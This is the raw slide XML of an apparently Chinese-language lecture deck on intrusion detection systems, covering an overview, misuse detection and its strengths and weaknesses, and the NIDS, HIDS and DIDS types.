                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE67CC7-62EE-2655-3B8B-A4EA4294A22D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1687553" y="3529385"/>
            <a:ext cx="4353560" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6856" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D61238-5635-4F21-B328-C080A470827D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2109" y="8378"/>
              <a:ext cx="585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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>检测准确度高</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="组合 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BC2094-EFE7-27FD-0FF2-A0ABEE7978DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="68" name="图片 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D03CDD8-92C5-AEC2-1667-37CB7206D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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F32569-BCC8-EB0E-AAAD-40C8056FCBD2}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E036500B-0691-8C71-FD46-28764DC1E199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2300149" y="4365877"/>
            <a:ext cx="3733666" cy="3956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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术相对成熟</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="组合 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F25C47D-8F1E-7290-F164-170314524B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1711804" y="4184160"/>
            <a:ext cx="876936" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="图片 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34500C01-7DB6-4D58-E00A-54E057772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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9327C35-87FC-7429-3ABE-C6900FA4441C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9170" y="4221"/>
              <a:ext cx="241" cy="711"/>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nvGrpSpPr>
          <p:cNvPr id="77" name="组合 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F547FBB7-A485-2CBA-94E4-315311DFC439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7270417" y="2641470"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318BAE8B-7979-5046-D7C0-3EBEECAAA67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9" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97561D01-6398-F491-F8E7-E992A291ACE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80" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B6426F-5403-17CA-41CA-76C8A032EEDD}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4866F277-ABA2-46D3-4283-97A05DE81271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758531" y="3766962"/>
            <a:ext cx="2977924" cy="349511"/>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不能检测新的入侵</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="组合 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A836A16-2359-6CAE-263F-BFB339D3C279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6158456" y="3532406"/>
            <a:ext cx="876935" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="图片 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908244A5-62DE-67B1-E5D4-4C4A5C21D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5" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A80E31E-1C00-1E72-A513-1C67A33D78D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sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3F4E0F-D93E-0894-8D83-C7BC298D3CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749194" y="4419033"/>
            <a:ext cx="3720874" cy="320388"/>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依赖于入侵特征的有效性</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="88" name="组合 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735D238C-3958-585F-E9AB-5404383FB130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6110831" y="4219349"/>
            <a:ext cx="934840" cy="761729"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="89" name="图片 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8431303-A8AF-AAB5-57C6-A754816E8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0" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79582A1-2EAE-C531-FD1E-9ECFA3657A2F}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2F15D4-A963-9578-2F41-C68E629308B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758531" y="4902970"/>
            <a:ext cx="3860242" cy="5512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维护特征库的工作量巨大</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="组合 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C0BAEA-B71B-AF30-2F84-8F8F7DB8808B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6121111" y="4727899"/>
            <a:ext cx="885344" cy="901376"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="图片 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726C6FC2-77B3-44FC-D11C-99B89F489C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09" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C189B490-B90A-6B29-6215-D03E11B16EF7}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3357EED-1B27-7C55-F333-BF0C54E63D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2272423" y="4998089"/>
            <a:ext cx="3946034" cy="3956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便于系统维护</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2400" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="组合 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91C57AB-9145-F7CA-4ABD-6BF98500F0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1703610" y="4800343"/>
            <a:ext cx="858689" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="113" name="图片 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D75D10-F4C7-2E7C-5EA2-D9DA9CFD6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14" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4D4BC5-0F7B-6B29-F4D4-8AA4EF55192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sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD2D568-E760-99C0-DC19-D013A406DE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316331" y="1434812"/>
            <a:ext cx="4693920"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800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>误用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测技术的评价：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE923C9-9B5B-C548-B981-6405AA5D06C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550110" y="1300637"/>
            <a:ext cx="1600331" cy="942555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形: 剪去左右顶角 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FE7399B-FF9F-30B5-AA56-F6018E792F2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787526" y="2339963"/>
            <a:ext cx="3875765" cy="3307494"/>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矩形: 剪去左右顶角 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3D209E-95DD-0147-1D70-AD3D678DBDF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273579" y="2358396"/>
            <a:ext cx="3991555" cy="3307494"/>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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4EE7FC5-223B-4ABD-88D5-8EA66941785F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>误用检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1174925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7FE56C7-A938-4AC0-8C8B-98AE9D55AB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="1620000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DE48FB-93CB-4A83-80C4-819A2E19507D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="矩形: 圆角 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075E11FA-47AF-410A-B62E-11BF604B473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7C1ACD8E-1DB0-407F-8ED0-530CC024A020}"/>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01</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0245B580-05B9-4A4A-A880-F45BF4A3B95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 入侵检测系统概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F393E855-347F-47DC-BF7C-D072346A7DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="2520000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBE5B2F-A33E-455C-94DC-0DD74C8598CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 圆角 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2BBEC0-744D-4D63-A1D7-D3EF3C0B5C6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0AFCDB31-7A42-4D30-973E-C7696D19502E}"/>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02</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FFEE7EAF-90BC-43F6-B7C2-088D4C3BCA4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原理和主要方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCCFF-6C07-4C65-8ED3-5FFF91FBAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="3420000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="组合 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066EB41-F32C-45C4-99C1-0918D8C5174D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 圆角 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14524E7A-B812-4FB1-9D63-990CF664AB3A}"/>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86134F92-3E5A-4DE8-A8AE-9BB2DCB1B79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03</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DE2AA675-157B-45F1-8702-9486056053C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accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF4BA50-6F79-4FE0-BB85-8085EE0839A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="4320000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
